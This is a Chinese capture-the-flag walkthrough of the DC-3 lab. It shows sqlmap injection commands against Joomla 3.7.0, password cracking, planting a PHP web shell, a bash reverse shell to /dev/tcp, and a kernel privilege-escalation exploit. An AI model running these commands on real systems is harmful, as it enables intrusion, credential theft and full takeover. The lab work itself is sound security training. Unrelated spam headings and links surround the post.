当前位置: 首页 > news >正文

目前网站开发趋势公司网站服务器选择

目前网站开发趋势,公司网站服务器选择,张家界优秀网站建设,陆金所网站开发二部DC-3 January 3, 2024 4:11 PM Tags:Joomla owner:只惠摸鱼 信息收集 探测靶机ip: 192.168.199.133 nmap 扫描端口、 系统版本 漏洞 发现只有80端口开发, 且有cve-2017-8917漏洞存在是Joomla的SQL注入漏洞 Joomla版本为3.7.0…

DC-3

January 3, 2024 4:11 PM
Tags:Joomla
owner:只惠摸鱼

信息收集

  • 探测靶机ip: 192.168.199.133

    在这里插入图片描述

  • nmap 扫描端口、 系统版本 漏洞

    在这里插入图片描述

    • 发现只有80端口开发, 且有cve-2017-8917漏洞存在
    • 是Joomla的SQL注入漏洞 Joomla版本为3.7.0
  • 打开页面看一下发现有登录页面,可以尝试弱口令,sql注入 或 爆破(页面有提示。只有一个flag,且为root权限才能看到)

    在这里插入图片描述

    • 尝试弱口令无果

漏洞利用

  • 使用kali中searchsploit 搜索cve-2017-8917 即搜索joomla 3.7.0的漏洞

在这里插入图片描述

  • 查看内容
    • searchsploit -x php/webapps/42033.txt

      在这里插入图片描述

    • 发现可以直接使用sqlmap 爆数据库

SQLmap爆数据

  • 爆数据库(默认配置选项)
    • sqlmap -u “http://192.168.199.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
      在这里插入图片描述

    • 得到数据库joomladb

  • 爆数据库表
    • sqlmap -u “http://192.168.199.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D “joomladb” --tables --batch -p list[fullordering]

      • —batch是为了使其默认使用默认配置选项

      在这里插入图片描述

    • 得到表#__users

  • 爆表字段名(不能使用默认,需要手动y一下)
    • sqlmap -u “http://192.168.199.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D “joomladb” -T “#__users” --columns -p list[fullordering]

      在这里插入图片描述

    • 只需查字段username 和 password中的值就可以了

  • 爆数据
    • sqlmap -u “http://192.168.199.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D “joomladb” -T “#__users” -C “username,password” --dump -p list[fullordering]

      在这里插入图片描述

    • 拿到admin账号 和一个 hash加密的密码

john解密

  • 密码:$2y 10 10 10DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu,放入txt文档

    在这里插入图片描述

    • 使用john进行解密
      在这里插入图片描述

    • 得到管理员账户密码

  • 发现还没有扫过目录,扫一下,看看是不是有管理员登录端(80端口只有用户端)

    • dirb http://192.168.199.133
      在这里插入图片描述

    • 发现有管理员页面

      在这里插入图片描述

    • 使用刚才得到的管理员账号密码登录,进入后端管理页面

      在这里插入图片描述

    • 寻找是否有能上传文件的地方,尝试了一些,都不太行,最后找到了一个可以直接写php代码的页面。

      在这里插入图片描述

    • 新增一个php文件类型,写入一句话木马
      在这里插入图片描述

    • 发现上方有提示的路径,尝试直接访问一下

      在这里插入图片描述

    • 发现不通, 百度了joomla的文件路径
      在这里插入图片描述

    • 发现一个熟悉的单词, 尝试用这个试一下(没报错,有戏)
      在这里插入图片描述

      • 继续尝试目录或文件,发现没报错。

        在这里插入图片描述

      • 尝试一下phpinfo(),成功!

      在这里插入图片描述

  • 使用蚁剑直接连接
    在这里插入图片描述

    • 成功连接

      在这里插入图片描述

    • 打开命令端口,发现不是root 也不是管理员权限

    在这里插入图片描述

提权

  • 查看系统内核版本

    在这里插入图片描述

  • 直接使用searchsploit Ubuntu 16.04查询相关漏洞,对比内核版本和漏洞类型,使用39772

    在这里插入图片描述

  • 查看漏洞内容,最上面的连接可以直接拉到浏览器查看详细信息(个人认为比较方便)

    • searchsploit -x linux/local/39772.txt

      在这里插入图片描述

  • 根据漏洞信息,和下方提供的漏洞下载链接下载到kali,通过蚁剑上传到后台解压exploit(这里是我运行过一次)

    在这里插入图片描述

  • 将shell反弹给本地

    • 本地监听1234端口

      在这里插入图片描述

    • 被控端运行bash -c 'bash -i >& /dev/tcp/192.168.199.129/1234 0>&1’

    • 本地得到shell

      在这里插入图片描述

  • 进入到ebpf_mapfd_doubleput_exploit运行./compile.sh会生成doubleput

  • 然后再运行./doubleput等待数秒,得到root权限

    在这里插入图片描述

  • 生成交互性shell

    • python3 -c 'import pty; pty.spawn(“/bin/bash”)’

      在这里插入图片描述

  • 进入/root 查询文件,找到flag。
    在这里插入图片描述

http://www.yayakq.cn/news/435589/

相关文章:

  • 在百度上做网站找谁站长网网站模板
  • 网站盈利模式有哪几种汽车网络营销方式
  • 企业营销型网站特点收录图片的网站
  • 廊坊做网站企业教程企业管理咨询公司前景
  • 怎么做一个电商网站延边网站建设
  • 做音乐网站的条件知名企业网站规划书
  • 做一个公司网站大概要多少钱建个网络平台多少钱
  • 遵化建设局网站全网营销型网站建站专家
  • 网站制作设计收费大钟寺网站建设
  • 爱站工具的功能卖手机网站开发的必要性
  • 建设网站怎么做wordpress默认的h1标签放在哪里
  • 怎么做系统网站北京建设大学
  • 如何做产品网站网页设计深圳设计公司深圳设计公司排名
  • 网站 需求文档今天的新闻头条
  • 吉林省工程信息网官网网络优化大师手机版
  • 冀州网站建设公司个人建站软件公司
  • 网站建设 小程序制作网站建设与管理试卷
  • 天天网站南宁网络营销策划推广公司
  • 做网站需要注册商标多少类代理网页 在线
  • 网站备案查询不到说明啥物联网工程主要学什么
  • 免费的空间网站数码设计网站
  • 网页微信版可以加入腾讯会议吗seo难不难
  • 建营销网站数字尾巴 wordpress
  • 网站开发 之cookie品牌包包都有哪些牌子
  • 电子商务网站怎么备案个人网站建设公司地址
  • 宜昌网站开发网站建设消费调查问卷
  • 江苏荣邦建设有限公司网站音乐外链生成网站怎么做
  • 淘客网站开发流程网络营销服务管理
  • 新网站建设一般多少钱网站建设外文文献翻译
  • 长春网站营销手机网站设计字体多大